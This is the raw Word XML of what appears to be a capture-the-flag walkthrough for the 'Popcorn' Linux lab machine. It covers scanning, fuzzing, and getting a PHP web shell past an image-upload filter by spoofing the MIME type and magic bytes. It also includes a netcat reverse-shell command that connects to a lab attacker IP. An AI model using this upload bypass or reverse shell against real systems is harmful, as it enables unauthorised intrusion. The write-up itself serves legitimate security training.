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Popcorn</w:t>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Medium</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Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Nmap</w:t>
      </w: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an nmap scan, we acquire the following</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702300"/>
                  <wp:effectExtent b="0" l="0" r="0" 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810250" cy="570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this information, the best place to go is the web page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">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pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Page</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Looking at the website, we get a basic html page.</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724525" cy="222885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24525" cy="2228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4">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">My first idea is to FUZZ the site. Doing so provides the following</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127500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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10250" cy="412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pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Going to “test” gives us a php page while “torrent” redirects us to a torrent page with a login</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7378700"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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10250" cy="737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pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>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4925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810250" cy="349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pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I attempted default credentials for the login to no avail. Then I registered for an account and that worked without confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon logging in I see a page full of torrents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>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52963" cy="4370734"/>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652963" cy="43707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6">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When I go to “uploads” I see that the only uploadable file type is a torrent file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>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295628" cy="4557713"/>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95628" cy="4557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B">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I will have to upload a torrent to get code execution, I think. I decide to simply use a kali torrent file off the kali website to do this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>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5676900"/>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10250" cy="567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pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading the torrent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>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844800"/>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810250" cy="284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pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After uploading, we got this page where we can edit a screenshot. Uploading a basic php web shell with the “.png.php” extension gives us an error. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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115385" cy="5805488"/>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15385" cy="5805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pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If we reupload an image from the source site, we get a good upload. It is possible a mime type is needed. To do that, have BurpSuite open while uploading a good image file and intercept the post request. There, we can see the file in byte form. From this we can grab the mime type and magic bytes off the file to trick the system into thinking the uploaded file is an image. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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51816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102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835400"/>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810250" cy="383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pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The highlighted portion in the above image is being copied after we convert to base64. Putting this into a file after decoding it, then running “file” against it will give us a file with type “png.” We can put this decoded (or original) mime/magic bytes directly into a burp request, or into the shellcode. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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810250" cy="2794000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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810250" cy="279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pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Doing the above shows a valid file upload. We can then see it succeeded under “/torrent/upload/”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>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49600"/>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810250"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pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Clicking on our image and typing in “whoami”, we see we have code execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>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58420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810250" cy="58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pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting a reverse shell, I check if some common tools are on the machine and see netcat is available. I then use the following code to get RCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>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nc -c bash 10.10.14.34 9000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71775" cy="4191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717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Pr>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4524375" cy="12573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24375"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3">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:pageBreakBefore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76">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Www-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
